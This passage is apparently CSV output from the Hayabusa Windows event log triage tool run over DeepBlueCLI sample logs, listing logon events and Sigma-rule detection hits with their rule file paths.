Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.424 
+09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 
08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type 
Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 
06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 
+09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution 
Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
